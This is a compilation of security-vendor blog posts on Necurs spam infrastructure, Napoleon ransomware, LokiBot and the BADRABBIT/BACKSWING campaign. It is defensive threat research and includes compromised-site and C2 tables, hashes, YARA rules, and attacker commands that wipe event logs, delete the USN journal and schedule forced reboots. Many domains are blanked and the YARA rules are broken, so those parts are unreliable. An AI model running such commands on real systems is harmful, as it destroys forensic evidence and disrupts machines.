Necurs also sends dating spam. Recent dating spam have arrived without any URLs in the body, except a mailto: link to an email address. Current dating campaigns have involved the free email provider, but other previous dating campaigns have taken advantage of similar free email services such as Necurs’ dating campaigns have also been known to include HTML links to fast-fluxed domains, or sometimes compromised websites (WordPress, etc.).

Necurs dating spam featuring an email address at

If you respond to one of these dating messages, you may be enrolled in a Russian dating website such as In this case, the criminals are making money by referring new users to these dating sites. Most likely they are being paid on an affiliate model.

Marmeladies is one of the dating sites to which victims who reply are directed


Of course one of Necurs’ most well-known payloads is ransomware. Necurs has been one of the biggest distributors of the Locky ransomware. Locky also works on an affiliate model. Inside of each locky sample, in the metadata, is an affiliate ID, which is always the same (3) for Necurs mailings. Most of the time, very little investment is made in the design of the messages themselves, as in the following example.

A typical ransomware campaign from Necurs


The rise (and fall) in the value of digital currencies such as Bitcoin and Etherium has not escaped the attention of the Necurs criminals. They have been seen conducting attack campaigns using domains designed to look similar to legitimate wallet management websites. In the email below, note the extra word ‘my’ in the domain ‘’.

This domain is registered to appear similar to the real Etherium wallet management site,

Recently, the Necurs attackers have drawn from previous stock pump-n-dump scams to come up with a relatively new tactic related to cryptocurrency. They had a spam campaign pumping Swisscoin (SIC).

A Necurs spam email encouraging recipients to buy Swisscoin (SIC)


Necurs was recently sending a low volume job spam campaign which includes links to freshly registered domains. For example, in the email below, sent October 30th 2017, we can see they are using a link to the domain, ‘’. (The affiliate id in the URL is always the same)

An example of a low volume, job-related spam campaign from Necurs



Checking the whois record for this domains we see the following registration details. Note the registrant email ‘’. This is an attempt by the threat actors to convince the casual observer that the domain is somehow registered through a third party whois privacy protection service. Email accounts are free to the public, and in this instance the attackers have simply generated the alias ‘whois-agent’ for their use in registering domains.

A review of the domains registered to ‘’ yields 399 domains (from DT as of January 17, 2018). The list of domains registered to ‘’ reads like a who’s-who of criminal activity.

Among some of the more notable domains we can see obvious phishing domains:

Typo-squattish domains targeting cryptocoin-related sites:

Fake Flash Player Update domains:

Even domains intended to masquerade as government resources:

A review of some of the domains in passive DNS gives us some other important clues. While most domains are only registered for the minimum of one year, the attackers have chosen to maintain the registration for a longer time on other domains such as ‘’. That domain is home to an online marketplace for buying and selling stolen credit card numbers, stolen ssh account credentials and more.

‘’ is a website dedicated to buying and selling stolen credit card numbers

Passive DNS also reveals instances where the attackers have hosted domains belonging to different registrants on the same IP address. For example, when Talos analyzed the passive DNS records for one of the attacker’s domains: ‘’ we found that this domain was hosted on a single IP address for a couple months in late 2016 before being parked. When we reviewed the other domains living on that same IP address we saw a bit of a pattern, and most importantly, some of these domains were NOT in the list of domains owned by ‘’.


When we check the registration information for one of the above domains ‘’, we find that there is a different registrant. This time the email address used to register the domain was ‘’. Just as with the ‘’ address, this is an attempt to appear to a casual observer that the domain is protected by whois privacy protection when in reality this email account appears to be under the direct control of the attackers themselves.

Reviewing the list of 1103 domains (Domain Tools as of January 17, 2018) associated with the ‘’ email address we see much of the same illicit activity we saw before.

More phishing domains:

More domains targeting cryptocoin-related resources:

Similar themed, fake Flash Player updates:

We even see targeting of government resources, just as we did with the other registrant account:


Checking the registration on some of the domains associated with ‘’, we can find some domains in which there are other registrants and the whois-privacy@ address is simply an Administrative and Technical Contact. This reveals an additional registrant email address employed by the attackers, ‘’.

According to Domain Tools (as of January 17, 2017), that email address is associated with over 2500 domains. Most of the domains belonging to this registrant email appeared to be domainer-style domains located at TLDs such as .bid and .top, but we also see a heavy dose of illegitimate looking domains in the set as well.

Some typical ‘Domainer’-ish domains:

Illegitimate Domains:


We can associate even more registrant email accounts with these same threat actors using similar techniques. While researching passive DNS for one of the domains we found previously, ‘’, we ran across something very interesting. That particular domain was hosted October 21, 2017 on the IP address which belongs to Alibaba as part of their cloud hosting product. When we analyze all the other domains which have been hosted on that same IP we see many domains that belong to the registrant email addresses we already knew about, ‘’ and ‘’. However we also see several domains associated with different registrants.


Looking at the list of domains found on this same Alibaba IP we find the domain ‘’. This domain is registered to the registrant email address, ‘’. This registrant has registered 125 domains (Domain Tools as of January 17, 2018), many of which have been linked to malicious activities. According to these links, domains associated with this registrant email have been used as part of the Rig Exploit Kit infrastructure. The domain, ‘’, was hosted on the Alibaba IP address on October 19, 2017 –only two days before the IP was used to host domains belonging to ‘’.


The domain ‘’ belongs to the registrant email address ‘’. The ‘’ domain was hosted on the IP on October 25th through October 30th, 2017 –also very close to the timeframe in which we saw the IP hosting the other malicious domains.

As of January 16, 2017, DomainTools attributes 918 domains to the registrant email address ‘’. Among some of the domains associated with this address we find gems such as:


The domain ‘’ is registered to ‘’. A Google search for this domain produces this linkat Hybrid Analysis and indicates that this particular domain was contacted as part of a piece of malware. At Virus Total, 50/68 antivirus engines detect this particular sample as malicious.


Searching Google for this registrant email address yields multiple links to malware that reaches out to domains owned by ‘’. Virus Total corroborates this information showing 48 and 53 antivirus detections respectively.


Reaching out through various contacts, Talos was able to confirm that, in fact, a single Alibaba cloud instance was controlling this same IP address for the entire time period from October 19, 2017 through October 30, 2017. Is this IP address some part of a criminal domain hosting service? Or is it that a single nefarious enterprise is behind all of these various registrant email accounts and their associated domains? Only the criminals involved in this enterprise can say for certain. Talos continues to monitor this situation with an eye towards further deciphering the business model deployed by these miscreants.


Now that Necurs is back from their regular holiday break they are attempting to fill our inboxes with junk mail and malware once again. On one hand, the size of the Necurs botnet, and its ability to send from different nodes in every campaign makes it difficult to defend against; Standard IP address blacklists are ineffective against such tactics. Fortunately for network defenders, the fact that Necurs does relatively little to curate their recipient database limits the damage they can do. There are only so many times the same recipients will fall for Necurs’ same, repetitive tricks. We can expect that Necurs will continue to try variations on some of their tried and true attacks, and so user education against these threats remains paramount.

Go to Source
Author: Talos Group

Napoleon: a new version of Blind ransomware

The ransomware previously known as Blind has been spotted recently with a .napoleon extension and some additional changes. In this post, we’ll analyze the sample for its structure, behavior, and distribution method.

Analyzed samples

31126f48c7e8700a5d60c5222c8fd0c7 – Blind ransomware (the first variant), with .blind extension

9eb7b2140b21ddeddcbf4cdc9671dca1 – Variant with .kill extension

235b4fa8b8525f0a09e0c815dfc617d3.napoleon (main focus of this analysis)

//special thanks to @demonslay335  for sharing the older samples

Distribution method

So far we are not 100 percent sure about the distribution method of this new variant. However, looking at the features of the malware and judging from information from the victims, we suspect that the attackers spread it manually by dropping and deploying on the hacked machines (probably via IIS). This method of distribution is not popular or efficient, however we’ve encountered similar cases in the past, such as DMALocker or LeChiffre ransomware. Also, few months ago, hacked IIS servers were used as a vector to plant Monero miners. The common feature of samples dropped in this way is that they are not protected by any cryptor (because it’s not necessary for this distribution method).

Behavioral analysis

After the ransomware is deployed, it encrypts files one-by-one, adding its extension in the format [email].napoleon.

Looking at the content of the encrypted test files, we can see that the same plaintext gave different ciphertext. This always indicates that different key or initialization vectors were used for each file. (After examining the code, it turned out that the difference was in the initialization vector).

Visualizing the encrypted content helps us guess the algorithm with which the files were encrypted. In this case, we see no visible patterns, so this leads us to suspect an algorithm with some method of chaining cipher blocks. (The most commonly used is AES in CBC mode, or eventually in CFB mode). Below, you can see the visualization made with the help of the file2png script: On the left is a BMP file before encryption. And on the right, after encryption by Napoleon:

At the end of each file, we found a unique 384-long block of alphanumeric characters. They represent 192 bytes written in hexadecimal. Most probably this block is the encrypted initialization vector for the particular file):

The ransom note is in HTA format and looks like this:

It also contains a hexadecimal block, which is probably the victim’s key, encrypted with the attackers’ public key.

The GUI of Napoleon looks simplified in comparison to the Blind ransomware. However, the building blocks are the same:

It is common among ransomware authors to prepare a tor-base website that allows automatic processing for payments and better organizes communication with the victim. In this case, the attackers decided to use just an email—probably because they planned for the campaign to be small.

Among the files created by the Napoleon ransomware, we will no longer find the cache file (netcache64.sys) that in the previous editions allowed to recover the key without paying the ransom.

Below is the cache file dropped by the Blind ransomware (the predecessor of Napoleon):

Inside the code

The malware is written in C++. It is not packed by any cryptor.

The execution starts in the function WinMain:

The flow is pretty simple. First, the ransomware checks the privileges with which it runs. If it has sufficient privileges, it deletes shadow copies. Then, it closes processes related to databases—Oracle and SQL Server—so that they will not block access to the database files it wants to encrypt. Next, it goes through the disks and encrypts found files. At the end, it pops up the dropped ransom note in HTA format.

Comparing the code of Napoleon with the code of Blind, we see that not just the extension of encrypted files has has changed, but also many functions inside have been refactored.

Below is a fragment of the view from BinDiff: Napoleon vs Blind:

What is attacked?

First, the ransomware enumerates all the logical drives in the system and adds them into a target list. It attacks both fixed and remote drives ( type 3 -> DRIVE_FIXED  and 4 -> DRIVE_REMOTE):

This ransomware does not have any list of attacked extensions. It attacks all the files it can reach. It skips only the files that already have the extension indicating they are encrypted by Napoleon:

The email used in the extension is hardcoded in the ransomware’s code.

Encryption implementation

Just like the previous version, the cryptographic functions of Napoleon are implemented with the help of the statically-linked library Crypto++ (source).

Referenced strings pointing to Crypto++:

Inside, we found a hardcoded blob—the RSA public key of the attackers:

After conversion to a standardized format, such as PEM, we were able to read its parameters using openssl, confirming that it is a valid 2048 bit–long RSA key:

Public-Key: (2048 bit)
Exponent: 17 (0x11)

This attacker’s public key is later used to encrypt the random key generated for the particular victim. The random key is the one used to encrypt files – after it is used and destroyed, it’s encrypted version is stored in the victim’s ID displayed in the ransom note. Only the attackers, having the private RSA key, are capable to recover it.

The random AES key (32 bit) is generated by the function provided by Crypto++ library:

It uses underneath the secure random generator: CryptGenRandom:

All the files are encrypted with the same key, however the initialization vector is different for each.

Encrypting single file:

Inside the function denoted as encrypt_file, the crypto is initialized with a new initialization vector:

The fragment of code responsible for setting the IV:

Setting initialization vector:

Encrypting file content:

The same buffer after encryption:


Napoleon ransomware will probably not become a widespread threat. The authors prepared it for small campaigns—lot of data, like email, are hardcoded. It does not come with any external configuration like Cerber that would allow for fast customization.

So far, it seems that the authors fixed the previous bug in Blind of dropping the cache file. That means the ransomware is not decryptable without having the original key. All we can recommend is prevention.

This ransomware family is detected by Malwarebytes as Ransom.Blind.


Read about how to decrypt the previous Blind variant here.

The post Napoleon: a new version of Blind ransomware appeared first on Malwarebytes Labs.

Go to Source
Author: Malwarebytes Labs

LokiBot: If not stealing, then extorting

Remember the Hydra of ancient mythology? The many-headed serpent that grew two heads when one was chopped off? A similarly dangerous beast has appeared in the Android malware zoo.


LokiBot as a banking Trojan

How do ordinary banking Trojans behave? They present the user with a fake screen that simulates the mobile banking interface. Unsuspecting victims enter their login credentials, which the malware redirects to the attackers, giving them access to the accounts.

How does LokiBot behave? Roughly the same way, but it simulates not only a banking app screen, but also WhatsApp, Skype, and Outlook client interfaces, displaying notifications purporting to come from these applications.

This means that a person can receive a fake notification, supposedly from their bank, saying that funds have been transferred to their account, and seeing the good news. then log in to the mobile banking client for confirmation. LokiBot even makes the smartphone vibrate when it displays the notification about the alleged transfer, which helps hoodwink even clued-in users.

But LokiBot has other tricks in store: It can open a browser, navigate to specific pages, and even use an infected device to send spam, which is basically how it distributes itself. Having pinched money from your account, LokiBot keeps going, sending a malicious SMS to all contacts in the phone book to infect as many smartphones and tablets as possible, and even replying to incoming messages if necessary.

If an attempt is made to remove LokiBot, the malware reveals another facet: To steal funds from a bank account, it needs administrator rights; if you try to deny it permission, it mutates from a banking Trojan into ransomware.


LokiBot as ransomware. How to unlock infected smartphone

In this case, LokiBot locks the screen and displays a message accusing the victim of viewing child pornography and demanding ransom; it also encrypts data on the device. Examining LokiBot’s code, researchers discovered that it uses weak encryption and doesn’t work properly; the attack leaves unencrypted copies of all files on the device, only under different names, so restoring the files is relatively simple.

However, the device screen is still locked, and the malware creators ask for about $100 in Bitcoin to unlock it. But you don’t have to oblige: After rebooting the device in safe mode, you can strip the malware of administrator rights and delete it. To do so, you first need to determine which version of Android you have:

  • Select Settings.
  • Select the General tab.
  • Select About the device.
  • Find the line Android version — the numbers below it indicate your OS version

To enable safe mode on a device with Version 4.4 to 7.1, do the following:

  • Press and hold the power button until a menu appears with the option Power off or Disconnect power source.
  • Press and hold Power off or Disconnect power source.
  • In the Turn on safe mode menu that appears, click OK.
  • Wait for the phone to reboot.

Owners of devices with other versions of Android should look online for information about how to enable safe mode for their particular phone.

Unfortunately, not everyone knows about this method of killing the malware: LokiBot victims have already coughed up nearly $1.5 million. And with LokiBot available on the black market for a mere $2,000, it is likely that the criminals responsible have repaid their investment many times over.


How to protect against LokiBot

In effect, the measures that can be taken to protect against LokiBot are applicable to any mobile malware. Here’s how to protect yourself:

– Never click on suspicious links — that’s how LokiBot spreads.

– Download apps only via Google Play — but be cautious even in the official store.

– Install a reliable security solution on your smartphone and tablet. Kaspersky Internet Security for Android detects all variants of LokiBot. With the paid version, there’s no need to scan the smartphone after installing each new application.

Go to Source
Author: Alexandra Golovina

BACKSWING – Pulling a BADRABBIT Out of a Hat

Executive Summary

On Oct. 24, 2017, coordinated strategic web compromises started to
distribute BADRABBIT ransomware to unwitting users. FireEye appliances
detected the download attempts and blocked our user base from
infection. During our investigation into the activity, FireEye
identified a direct overlap between BADRABBIT redirect sites and sites
hosting a profiler we’ve been tracking as BACKSWING. We’ve identified
51 sites hosting BACKSWING and four confirmed to drop BADRABBIT.
Throughout 2017, we observed two versions of BACKSWING and saw a
significant increase in May with an apparent focus on compromising
Ukrainian website. The pattern of deployment raises the possibility of
a strategic sponsor with specific regional interests and suggest a
motivation other than financial gain. Given that many domains are
still compromised with BACKSWING, we anticipate that there is a risk
that they will be used for future attacks.

Incident Background

Beginning on Oct. 24 at 08:00 UTC, FireEye detected and blocked
attempts to infect multiple clients with a drive-by download
masquerading as a Flash Update (install_flash_player.exe) that
delivered a wormable variant of ransomware. Users were redirected to
the infected site from multiple legitimate sites (e.g.
simultaneously, indicating a coordinated and widespread strategic web
compromise campaign.

FireEye network devices blocked infection attempts at over a dozen
victims primarily in Germany, Japan, and the U.S. until Oct. 24 at
15:00 UTC, when the infection attempts ceased and attacker
infrastructure – both 1dnscontrol[.]com and the legitimate websites
containing the rogue code – were taken offline.

BACKSWING Framework Likely Connected to BADRABBIT Activity

Strategic web compromises can have a significant amount of
collateral targeting. It is common for threat actors to pair a
strategic web compromise with profiling malware to target systems with
specific application versions or victims. FireEye observed that
BACKSWING, a malicious JavaScript profiling framework, was deployed to
at least 54 legitimate sites starting as early as September 2016.  A
handful of these sites were later used to redirect to BADRABBIT
distribution URLs.

FireEye iSIGHT Intelligence tracks two distinct version of BACKSWING
that contain the same functionality, but differ in their code styles.
We consider BACKSWING a generic container used to select attributes of
the current browsing session (User-Agent, HTTP Referrer, Cookies, and
the current domain). This information is then relayed to a “C2”
sometimes to referred to as a “receiver.” If the receiver is online,
the server returns a unique JSON blob to the caller which is then
parsed by the BACKSWING code (Figure 1).

Figure 1: BACKSWING Reply

BACKSWING anticipates the JSON blob to have two fields,
“InjectionType” (expected to be an integer) and “InjectionString”
(expected to be string containing HTML content). BACKSWING version 1
(Figure 2) explicitly handles the value of “InjectionType” into two
code paths:

  • If InjectionType == 1 (Redirect browser to URL)
  • If
    InjectionType != 1 (render HTML into the DOM)

Figure 2: Backswing Version 1

In Version 2 (Figure 3), BACKSWING retains similar logic, but
generalizes the InjectionString to be handled strictly to render the
reply into the DOM.

Figure 3: BACKSWING Version 2

Version 1:

  • FireEye observed the first version of BACKSWING in late 2016
    on websites belonging to a Czech Republic hospitality organization
    in addition to a government website in Montenegro. Turkish-tourism
    websites were also injected with this profiler.
    v1 was commonly injected in cleartext to affected websites, but over
    time, actors began to obfuscate the code using the open-source
    Dean-Edwards Packer and injected it into legitimate JavaScript
    resources on affected websites. Figure 4 shows the injection
  • Beginning in May 2017, FireEye observed a number of
    Ukrainian websites compromised with BACKSWING v1, and in June 2017,
    began to see content returned from BACKSWING receivers.
  • In
    late June 2017, BACKSWING servers returned an HTML div element with
    two distinct identifiers. When decoded, BACKSWING v1 embedded two
    div elements within the DOM with values of
    07a06a96-3345-43f2-afe1-2a70d951f50a and
    9b142ec2-1fdb-4790-b48c-ffdf22911104. No additional content was
    observed in these replies.

Figure 4: BACKSWING Injection Content

Version 2:

  • The earliest that FireEye observed BACKSWING v2 occurred on
    Oct. 5, 2017 across multiple websites that previously hosted
  • BACKSWING v2 was predominantly injected into
    legitimate JavaScript resources hosted on affected websites;
    however, some instances were injected into the sites’ main
  • FireEye observed limited instances of websites hosting
    this version were also implicated in suspected BADRABBIT infection
    chains (detailed in Table 1).

Malicious profilers allow attackers to obtain more information about
potential victims before deploying payloads (in this case, the
BADRABBIT “flash update” dropper). While FireEye has not directly
observed BACKSWING delivering BADRABBIT, BACKSWING was observed on
multiple websites that were seen referring FireEye customers to
1dnsccontrol[.]com, which hosted the BADRABBIT dropper.

Table 1 highlights the legitimate sites hosting BACKSWING that were
also used as HTTP referrers for BADRABBIT payload distribution.

Compromised Website BACKSWING Receiver BACKSWING Version Observed BADRABBIT Redirect
blog.fontanka[.]ru Not Available Not Available 1dnscontrol[.]com[.]jp http://185.149.120[.]3/scholargoogle/ v2 1dnscontrol[.]com
www.fontanka[.]ru http://185.149.120[.]3/scholargoogle/ v2 1dnscontrol[.]com
www.mediaport[.]ua http://172.97.69[.]79/i/ v1 1dnscontrol[.]com
www.mediaport[.]ua http://185.149.120[.]3/scholargoogle/ v2 1dnscontrol[.]com
www.smetkoplan[.]com http://172.97.69[.]79/i/ v1 1dnscontrol[.]com
www.smetkoplan[.]com http://38.84.134[.]15/Core/Engine/Index/default v1 1dnscontrol[.]com
www.smetkoplan[.]com http://185.149.120[.]3/scholargoogle/ v2 1dnscontrol[.]com

Table 1: Sites hosting BACKSWING profilers and
redirected users to a BADRABBIT download site

The compromised websites listed in Table 1 demonstrate one of the
first times that we have observed the potential weaponization of
BACKSWING. FireEye is tracking a growing number of legitimate websites
that also host BACKSWING underscoring a considerable footprint the
actors could leverage in future attacks. Table 2 provides a list of
sites also compromised with BACKSWING

Compromised Website BACKSWING Receiver BACKSWING Version
akvadom.kiev[.]ua http://172.97.69[.]79/i/ v1[.]ua http://dfkiueswbgfreiwfsd[.]tk/i/ v1[.]ua http://172.97.69[.]79/i/ v1[.]ua http://172.97.69[.]79/i/ v1[.]ua http://172.97.69[.]79/i/ v1[.]me http://38.84.134[.]15/Core/Engine/Index/two v1
Evrosmazki[.]ua http://172.97.69[.]79/i/ v1
forum.andronova[.]net http://172.97.69[.]79/i/ v1
forum.andronova[.]net http://91.236.116[.]50/Core/Engine/Index/two v1
grandua[.]ua http://172.97.69[.]79/i/ v1
grupovo[.]bg http://185.149.120[.]3/scholargoogle/ v2
hr.pensionhotel[.]com http://38.84.134[.]15/Core/Engine/Index/default v1[.]ua http://172.97.69[.]79/i/ v1[.]ua http://185.149.120[.]3/scholargoogle/ v2
icase.lg[.]ua http://172.97.69[.]79/i/ v1
montenegro-today[.]com http://38.84.134[.]15/Core/Engine/Index/two v1
montenegro-today[.]ru http://172.97.69[.]79/i/ v1
most-dnepr[.]info http://172.97.69[.]79/i/ v1
most-dnepr[.]info http://185.149.120[.]3/scholargoogle/ v2
obereg-t[.]com http://172.97.69[.]79/i/ v1
sarktur[.]com http://104.244.159[.]23:8080/i v1
sarktur[.]com http://38.84.134[.]15/Core/Engine/Index/default v1[.]ua http://172.97.69[.]79/i/ v1
sinematurk[.]com http://91.236.116[.]50/Core/Engine/Index/two v1
vgoru[.]org http://172.97.69[.]79/i/ v1
www.2000[.]ua http://172.97.69[.]79/i/ v1
www.444android[.]com http://172.97.69[.]79/i/ v1
www.444android[.]com http://91.236.116[.]50/Core/Engine/Index/two v1[.]jp http://38.84.134[.]15/Core/Engine/Index/default v1
www.alapli.bel[.]tr http://91.236.116[.]50/Core/Engine/Index/two v1
www.ambilet[.]ro http://185.149.120[.]3/scholargoogle/ v2
www.andronova[.]net http://91.236.116[.]50/Core/Engine/Index/two v1[.]ua http://172.97.69[.]79/i/ v1
www.dermavieskin[.]com https://bodum-online[.]gq/Core/Engine/Index/three v1
www.evrosmazki[.]ua http://172.97.69[.]79/i/ v1
www.hercegnovi[.]me http://38.84.134[.]15/Core/Engine/Index/two v1
www.len[.]ru http://185.149.120[.]3/scholasgoogle/ v2
www.montenegro-today[.]com http://38.84.134[.]15/Core/Engine/Index/two v1
www.montenegro-today[.]com http://91.236.116[.]50/Core/Engine/Index/two v1
www.otbrana[.]com http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]be http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]cz http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]de http://172.97.69[.]79/i/ v1
www.pensionhotel[.]de http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]dk http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]nl http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]pl http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]ro http://46.20.1[.]98/scholargoogle/ v1
www.pensionhotel[.]sk http://38.84.134[.]15/Core/Engine/Index/default v1
www.sinematurk[.]com http://91.236.116[.]50/Core/Engine/Index/two v1
www.t.ks[.]ua http://172.97.69[.]79/i/ v1
www.teknolojihaber[.]net http://91.236.116[.]50/Core/Engine/Index/two v1
www.uscc[.]ua http://172.97.69[.]79/i/ v1
www.vertizontal[.]ro http://91.236.116[.]50/Core/Engine/Index/three v1
www.visa3777[.]com http://172.97.69[.]79/i/ v1
www.www.pensionhotel[.]de http://38.84.134[.]15/Core/Engine/Index/default v1

Table 2: Additional sites hosting BACKSWING
profilers and associated receivers

The distribution of sites compromised with BACKSWING suggest a
motivation other than financial gain. FireEye observed this framework
on compromised Turkish sites and Montenegrin sites over the past year.
We observed a spike of BACKSWING instances on Ukrainian sites, with a
significant increase in May 2017. While some sites hosting BACKSWING
do not have a clear strategic link, the pattern of deployment raises
the possibility of a strategic sponsor with specific regional interests.

BADRABBIT Components

BADRABBIT is made up of several components, as described in Figure 5.

Figure 5: BADRABBIT components

Install_flashPlayer.exe (MD5: FBBDC39AF1139AEBBA4DA004475E8839)

The install_flashplayer.exe payload drops infpub.dat (MD5:
C4F26ED277B51EF45FA180BE597D96E8) to the C:Windows directory and
executes it using rundll32.exe with the argument
C:Windowsinfpub.dat,#1 15. This execution format mirrors that of EternalPetya.

infpub.dat (MD5: 1D724F95C61F1055F0D02C2154BBCCD3)

The infpub.dat binary is the primary ransomware component
responsible for dropping and executing the additional components shown
in the BADRABBIT Components section. An embedded RSA-2048 key
facilitates the encryption process, which uses an AES-128 key to
encrypt files. The extensions listed below are targeted for encryption:

The following directories are ignored during the encryption process:

  • Windows
  • Program Files
  • ProgramData
  • AppData

The malware writes its ransom message to the root of each affected
drive with the filename Readme.txt.

The inpub.dat is capable of performing lateral movement via WMI or
SMB. Harvested credentials provided by an embedded Mimikatz executable
facilitate the infection of other systems on the network. The malware
contains lists of common usernames, passwords, and named pipes that it
can use to brute-force other credentials for lateral movement.

If one of four Dr.Web antivirus processes is present on the system,
file encryption is not performed. If the malware is executed with the
“-f” command line argument, credential theft and lateral movement are bypassed.

dispci.exe (MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)

The dispci.exe binary interacts with the DiskCryptor driver
(cscc.dat) to install the malicious bootloader. If one of three McAfee
antivirus processes is running on the system, dispci.exe is written to
the %ALLUSERSPROFILE% directory; otherwise, it is written to
C:Windows. The sample is executed on system start using a scheduled
task named rhaegal.

cscc.dat (MD5s: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A)

A 32 or 64-bit DiskCryptor
driver named cscc.dat facilitates disk encryption. It is installed in
the :Windows directory as a kernel driver service named cscc.

Mimikatz usage (MD5s: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977)

A 32 or 64-bit Mimikatz variant is written a temporary file (e.g.,
651D.tmp) in the C:Windows directory and executed by passing a named
pipe string (e.g., \.pipe{8A93FA32-1B7A-4E2F-AAD2-76A095F261DC}) as
an argument. Harvested credentials are passed back to infpub.dat via
the named pipe, similar to EternalPetya.

BADRABBIT Compared to EternalPetya

The infpub.dat contains a checksum algorithm like the one used in
EternalPetya. However, the initial checksum value differs slightly:
0x87654321 in infpub.dat, 0x12345678 in EternalPetya. infpub.dat also
supports the same command line arguments as EternalPetya with the
addition of the “-f” argument, which bypasses the malware’s credential
theft and lateral movement capabilities.

Like EternalPetya, infpub.dat determines if a specific file exists
on the system and will exit if found. The file in this case is
cscc.dat. infpub.dat contains a wmic.exe lateral movement capability,
but unlike EternalPetya, does not contain a PSEXEC binary used to
perform lateral movement.

Both samples utilize the same series of wevtutil and fsutil commands
to perform anti-forensics:

wevtutil cl Setup & wevtutil cl
System & wevtutil cl Security & wevtutil cl Application
& fsutil usn deletejournal /D %SYSTEMDRIVE%

FireEye Detections

Product Detection Names
NX,EX,AX,FX,ETP malware.binary.exe,
Trojan.Ransomware.MVX, Exploit.PossibleWaterhole.BACKSWING
Created], WINDOWS METHODOLOGY [Service Installation], WINDOWS
Ordinal Arg], WINDOWS METHODOLOGY [Wevtutil Clear-log],
METHODOLOGY [Multiple Admin Share Failures]

We would like to thank Edward Fjellskål for his assistance with
research for this blog.


File: Install_flashPlayer.exe
install_flashplayer.exe drops infpub.dat

File: infpub.dat
Hash: 1D724F95C61F1055F0D02C2154BBCCD3
Description: Primary ransomware component

File: dispci.exe
Hash: B14D8FAF7F0CBCFAD051CEFE5F39645F
Description: Interacts with the DiskCryptor driver (cscc.dat) to
install the malicious bootloader, responsible for file decryption.

File: cscc.dat
Hash: B4E6D97DAFD9224ED9A547D52C26CE02 or
Description: 32 or 64-bit
DiskCryptor driver

File: .tmp
37945C44A897AA42A66ADCAB68F560E0 or
Description: 32 or 64-bit
Mimikatz variant

File: Readme.txt
Hash: Variable
Description: Ransom note

Command: system32rundll32.exe C:Windowsinfpub.dat,#1 15
Description: Runs the primary ransomware component of BADRABBIT. Note
that “15” is the default value present in the malware and may be
altered by specifying a different value on command line when executing install_flash_player.exe.

Command: %COMSPEC% /c schtasks /Create /RU SYSTEM /SC ONSTART /TN
rhaegal /TR “<%COMSPEC%> /C Start “”
“” -id
Description: Creates
the rhaegal scheduled task

Command: %COMSPEC% /c schtasks /Create /SC once /TN drogon /RU
SYSTEM /TR “%WINDIR%system32shutdown.exe /r /t 0 /f” /ST

Description: Creates the drogon scheduled task

Command: %COMSPEC% /c schtasks /Delete /F /TN drogon
Description: Deletes the drogon scheduled task

Command: %COMSPEC% /c wswevtutil cl Setup & wswevtutil cl System
& wswevtutil cl Security & wswevtutil cl Application &
fsutil usn deletejournal /D :
Description: Anti-forensics

Scheduled Task Name: rhaegal
Scheduled Task Run:
“<%COMSPEC%> /C Start “”
“” -id
&& exit”
Description: Bootloader interaction

Scheduled Task Name: drogon
Scheduled Task Run:
“%WINDIR%system32shutdown.exe /r /t 0 /f”
Description: Forces a reboot

Service Name: cscc
Service Display Name: Windows Client Side
Caching DDriver
Service Binary Path: cscc.dat

Embedded usernames from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
other user
Embedded passwords from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Embedded pipe names from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)

Yara Rules

rule FE_Hunting_BADRABBIT {
@TekDefense & nicholas.carr @itsreallynick”
md5 =
// Messages
$msg1 =
“Incorrect password” nocase ascii wide
$msg2 = “Oops! Your files have been encrypted.”
ascii wide
$msg3 = “If you see this text,
your files are no longer accessible.” ascii wide
$msg4 = “You might have been looking for a way to
recover your files.” ascii wide
$msg5 =
“Don’t waste your time. No one will be able to recover
them without our” ascii wide
$msg6 =
“Visit our web service at” ascii wide
$msg7 = “Your personal installation key#1:” ascii
$msg8 = “Run DECRYPT app at your
desktop after system boot” ascii wide
= “Password#1” nocase ascii wide
$msg10 = “caforssztxqzf2nm.onion” nocase ascii
$msg11 = /partition (unbootable|not
(found|mounted))/ nocase ascii wide

// File
$fref1 =
“C:\Windows\cscc.dat” nocase ascii wide
$fref2 = “\\.\dcrypt” nocase ascii wide
$fref3 = “Readme.txt” ascii wide
$fref4 = “\Desktop\DECRYPT.lnk” nocase ascii
$fref5 = “dispci.exe” nocase
ascii wide
$fref6 =
“C:\Windows\infpub.dat” nocase ascii wide
$meta1 =
“” nocase ascii wide
$meta2 = “dispci.exe” nocase ascii wide
$meta3 = “GrayWorm” ascii wide
$meta4 = “viserion” nocase ascii wide
$com1 = “ComSpec” ascii
$com2 = “\cmd.exe” nocase ascii
$com3 = “schtasks /Create” nocase
ascii wide
$com4 = “schtasks /Delete /F /TN
%ws” nocase ascii wide
(uint16(0) == 0x5A4D)
(8 of
($msg*) and 3 of ($fref*) and 2 of ($com*))
(all of ($meta*) and 8 of ($msg*))

author =
md5 =
rev = 1
$api1 =
“GetSystemDirectoryW” fullword
$api2 = “GetModuleFileNameW” fullword
$dropped_dll = “infpub.dat” ascii fullword
$exec_fmt_str = “%ws
C:\Windows\%ws,#1 %ws” ascii fullword wide
$extract_seq = { 68 ?? ?? ?? ?? 8D 95 E4 F9 FF FF 52 FF
15 ?? ?? ?? ?? 85 C0 0F 84 C4 00 00 00 8D 85 A8 ED FF FF 50 8D
8D AC ED FF FF E8 ?? ?? ?? ?? 85 C0 0F 84 AA 00 00 00 }
(uint16(0) == 0x5A4D and
uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB
and all of them

author = “muhammad.umair”
md5 = “1d724f95c61f1055f0d02c2154bbccd3”
rev = 1
$api1 =
“WNetAddConnection2W” fullword
$api2 = “CredEnumerateW” fullword
$api3 = “DuplicateTokenEx” fullword
$api4 = “GetIpNetTable”
$del_tasks = “schtasks /Delete /F /TN drogon” ascii
fullword wide
$dropped_driver =
“cscc.dat” ascii fullword wide
$exec_fmt_str = “%ws C:\Windows\%ws,#1 %ws” ascii
fullword wide
